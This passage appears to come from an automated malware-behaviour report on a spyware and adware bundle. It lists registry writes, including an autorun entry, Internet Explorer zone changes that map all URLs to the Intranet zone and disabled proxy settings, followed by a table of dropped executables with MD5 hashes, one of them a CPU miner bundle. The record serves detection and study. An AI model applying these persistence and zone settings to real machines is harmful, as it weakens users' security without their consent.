"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"InstallDate" = "20150902"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010077\unins000.exe /SILENT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010077]
"PathInstall" = "%Program Files%\gmsd_re_005010077"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Tinstalls]
"20150902" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 81 4E 45 3B 6D 87 42 F1 0A 2B C4 B4 C0 20 1E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"InstallLocation" = "%Program Files%\gmsd_re_005010077\"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010077"
[HKCU\Software\TutoTag]
"OnceInstalled2" = "re"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010077" = "%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process nsh2B.tmp:1860 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 35 44 33 39 E7 66 0C E0 EF 6D 9D DC 4F 79 5A"
The process encrypt.exe:560 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 62 74 2E BC FF 6A 13 BC 97 B8 E9 18 D4 DE 37"
The process encrypt.exe:1400 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 4F D0 9D 95 66 C8 8A 1F E1 52 3E 63 40 41 72"
The process encrypt.exe:424 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 63 8B 4C FD BE 73 59 B7 A0 59 4F 68 6F 1A FA"
The process encrypt.exe:460 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 78 DA EF 3C E8 3D 1D 2D 57 8F D8 10 40 1E 2B"
The process 3075.exe:976 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3496]
"setup.exe" = "Crossbrowse Installer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF AE A9 DA 6B 7E D1 A0 07 2F 04 95 E3 A2 3C 59"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallDate" = "20150821"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsiB.tmp:644 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 20 FC DA 89 B3 C3 43 CA BD 40 E4 7F F4 48 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsw7.tmp:1688 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 70 9A C4 05 C9 DE 19 B8 26 B4 4C EC 2D 3A 82"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-imi-tot-cpm-opw-crr"
The process nst36.tmp:2008 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "iml"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 CC 4A 42 1A E4 7D A7 E9 A0 46 54 82 6B 50 58"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsw22.tmp:272 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 25 BF 1E D5 C0 D1 94 47 1E 39 27 8B 0B DD D1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
f0196b97c3fba8a469b99d0919a3cf4c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe |
d2a7b8934eb6ff84efc6479c91c8081b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3075.exe |
de36bf8875ae7354dee15db775eb671d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3496\setup.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
7b1977dca8506d7aa3b23732aeca6a26 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe |
a3078153a7a53bfc0a7a0b8fd20d757a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\fsd34.exe |
f9a709bbecced10d4a84f93c75604e04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa19.tmp |
5264f7d6d89d1dc04955cfb391798446 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\GetVersion.dll |
b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\Math.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\System.dll |
7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\UserInfo.dll |
5afd4a9b7e69e7c6e312b2ce4040394a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\blowfish.dll |
94ba775c8a1f4d6c9bb1966eddce22b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\manlib.dll |
fe3f848e2a306d586ab8f5433738d8db | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\nsCBHTML5.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\nsDialogs.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\nsisunz.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\registry.dll |
febff2c363c7f7664687eefe8253087e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\serlib.dll |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj3.tmp\inetc.dll |
fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjE.tmp |
8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm25.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2A.tmp\Registry.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq1D.tmp\Registry.dll |
b6513a83d6cc58be61812cce8148c6f5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq3D.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr21.tmp\Registry.dll |
f9a709bbecced10d4a84f93c75604e04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe |
e822fe92076c33fa1784749fa9328584 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\df4a6a3ed77e60d6758afca091ca0c1f[1].exe |
5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lHFcE[1].exe |
8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_CPUminer[1].exe |
a3078153a7a53bfc0a7a0b8fd20d757a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\FinalInstaller_dotnet4[1].exe |
d2a7b8934eb6ff84efc6479c91c8081b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].exe |
0ccf900044e0e4edf36e89008e2c6aa7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_362[1].exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe |
6f61b80a1552c32073f082cc1798cd71 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\policyname[1].exe |
95368f27adfcaa865195174d724e7a4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe |
ad3ce40da858a76f235974af46c18365 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
b6513a83d6cc58be61812cce8148c6f5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VuuPC_VO2_8907[1].exe |
051e3f4fd2fc016148ab1e9c53e286d1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe |
00ccf557175b834662b75c2fe6d8c7fa | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\PepperFlash\pepflashplayer.dll |
cc24001b457f3cfb86ab174d68ffe02b | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome.dll |
8c51d8ebd090ff4d510ca25d01f04196 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_child.dll |
b799e609a738b42a993ec13fbaedff8e | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\d3dcompiler_46.dll |
670da7998dfbf06dae646c8d8f6e06c4 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe |
c032d88eb99f7562bb58e00f41b9d6a4 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\ffmpegsumo.dll |
0e2e43dc527bb894b4eaa0723b7d8450 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libegl.dll |
8ff5fccdae68c1f04e29211b8ab2413a | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libexif.dll |
